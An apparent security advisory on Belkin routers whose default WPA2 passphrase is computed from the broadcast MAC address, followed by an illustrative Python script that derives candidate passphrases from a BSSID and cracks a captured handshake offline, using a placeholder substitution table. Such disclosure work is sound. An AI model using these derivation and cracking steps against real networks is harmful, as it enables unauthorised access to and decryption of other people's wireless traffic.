A number of Belkin wireless routers ship with a default WPA2 passphrase that protects the wireless network out of the box. The apparently random passphrase is printed on a label on the underside of the router.
In theory this approach should be more secure, because a vendor-generated passphrase is likely stronger than what many users would choose themselves. It turns out, however, that the "random" passphrases aren't random at all.
The researchers determined that the passphrase is derived from the device's WAN MAC address. Because that address is easy to obtain (it is one or two above the WLAN MAC address that the router broadcasts in every beacon frame), an attacker within wireless range can compute the passphrase and join any network that still uses the default configuration.
The default passphrase consists of 8 characters, each obtained by replacing a hex digit of the WAN MAC address with a value from a static substitution table.
Several device models are affected, including Belkin N450 Model F9K1105V2 and Belkin Surf N150 Model F7D1301v1.
The researchers say they contacted Belkin in January and, having received no response, have now published their findings. In the meantime they advise users to replace the default passphrase with a stronger one of their own.
Vulnerability :
Having a preconfigured, randomly generated WPA2-PSK passphrase on a wireless router is basically a good idea, since a vendor-generated passphrase can be much stronger than most user-chosen passwords. In the case of Belkin, however, the default passphrase is calculated solely from the MAC address of the device. Since the MAC address is broadcast in the beacon frames the device sends out, a wireless attacker can calculate the default passphrase and connect to the network.
Each of the eight characters of the default passphrase is created by substituting the corresponding hex digit of the WAN MAC address using a static substitution table. Since the WAN MAC address is the WLAN MAC address plus one or two (depending on the model), a wireless attacker needs at most two guesses for the WAN MAC address and can thus calculate the default WPA2 passphrase.
Moreover, the default WPA2-PSK passphrase consists solely of 8 hexadecimal digits, so its entropy is at most 32 bits (33 bits for an attacker who does not know whether the model uses upper- or lowercase digits, since that doubles the key space). After sniffing one successful client association (the WPA2 four-way handshake), an attacker can run an offline brute-force attack against the passphrase even without knowing the substitution table. oclHashcat-plus can test about 131,000 passphrases per second on one high-end GPU (AMD Radeon HD 7970) [Link]. Exhausting the full 32-bit key space takes about 9 hours at this rate, and on average the passphrase is found in half that time.
An attacker who has calculated or cracked the WPA2-PSK passphrase can derive the session keys of every client whose association (four-way handshake) was captured and decrypt that client's wireless traffic in a purely passive attack, without ever associating with the network.
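The two attack paths described above, the targeted derivation from the broadcast BSSID and the offline brute force after a captured handshake, as an added worked example. This is illustrative code written for this page, not the researchers' tool or anything shipped by Belkin. It assumes: a placeholder substitution table (SUBST), since the real Belkin table is not reproduced here; that the 8 passphrase characters come from the last 8 hex digits of the WAN MAC (the advisory says 8 digits of the MAC but not which); WAN MAC = BSSID + 1 or + 2 as stated; and a constructed sample BSSID and SSID. The PMK derivation (PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output) is the standard IEEE 802.11i one and is the per-guess cost an offline cracker pays.

```python
"""Belkin-style default passphrase: derivation from the BSSID and offline cracking cost.

Added example for this page, not the researchers' or Belkin's code.
Assumptions (see lead-in): placeholder SUBST table, last 8 hex digits of the
WAN MAC, WAN MAC = BSSID + 1 or + 2, constructed sample BSSID/SSID.
"""
import hashlib
import hmac
from typing import Dict, List, Optional

# Placeholder substitution table (NOT the real Belkin table).  Any fixed,
# public table has the same flaw: the passphrase is a deterministic
# function of a value the router broadcasts.
SUBST: Dict[str, str] = {c: "fedcba9876543210"[i] for i, c in enumerate("0123456789abcdef")}


def mac_to_int(mac: str) -> int:
    """'94:44:52:12:34:56' -> 48-bit integer."""
    return int(mac.replace(":", "").replace("-", ""), 16)


def int_to_mac(n: int) -> str:
    """48-bit integer -> 12 lowercase hex digits, no separators."""
    return "%012x" % (n & 0xFFFFFFFFFFFF)


def default_passphrase(wan_mac: str, table: Dict[str, str] = SUBST, upper: bool = False) -> str:
    """Substitute each of the last 8 hex digits of the WAN MAC through the table."""
    digits = wan_mac.replace(":", "").lower()[-8:]
    pw = "".join(table[d] for d in digits)
    return pw.upper() if upper else pw


def candidates_from_bssid(bssid: str, offsets=(1, 2)) -> List[str]:
    """What an attacker can compute from a beacon frame alone.

    The WAN MAC is the BSSID + 1 or + 2 depending on model, and some models
    use uppercase digits, so the whole targeted search space is 4 guesses.
    """
    base = mac_to_int(bssid)
    out = []
    for off in offsets:
        wan = int_to_mac(base + off)
        for upper in (False, True):
            out.append(default_passphrase(wan, upper=upper))
    return out


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i passphrase -> PMK: PBKDF2-HMAC-SHA1, 4096 iterations, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def offline_crack(target_pmk: bytes, ssid: str, guesses) -> Optional[str]:
    """Offline check against a captured handshake.

    A real cracker verifies the handshake MIC rather than comparing PMKs, but
    the PBKDF2 work per guess, which sets the ~131k/s GPU rate, is identical.
    """
    for g in guesses:
        if hmac.compare_digest(wpa2_pmk(g, ssid), target_pmk):
            return g
    return None


def exhaustive_hours(charset_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case hours to search every passphrase of the given shape."""
    return charset_size ** length / guesses_per_second / 3600


if __name__ == "__main__":
    bssid = "94:44:52:12:34:56"  # constructed sample BSSID, not a real device
    ssid = "belkin.456"          # constructed sample SSID
    cands = candidates_from_bssid(bssid)
    print("candidates from beacon:", cands)
    # Hypothetical model where WAN MAC = BSSID + 2, lowercase digits.
    real = default_passphrase(int_to_mac(mac_to_int(bssid) + 2))
    pmk = wpa2_pmk(real, ssid)  # stands in for the captured handshake
    print("recovered passphrase:", offline_crack(pmk, ssid, cands))
    # Even without the table: 16^8 hex passphrases at the page's GPU rate.
    print("hours to exhaust 16^8 at 131,000/s: %.1f" % exhaustive_hours(16, 8, 131_000))
    print("hours if the case is unknown (2 * 16^8): %.1f" % (2 * exhaustive_hours(16, 8, 131_000)))
```

The targeted path needs four PBKDF2 evaluations, well under a second on a laptop; the blind path is the 16^8 mask attack the advisory prices at about 9 hours. Both are only possible because the secret is a function of a public input, which is the design error here, not the choice of hex digits as such.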
Affected devices :
Belkin Surf N150 Model F7D1301v1
Belkin N900 Model F9K1104v1
Belkin N450 Model F9K1105V2
Belkin N300 Model F7D2301v1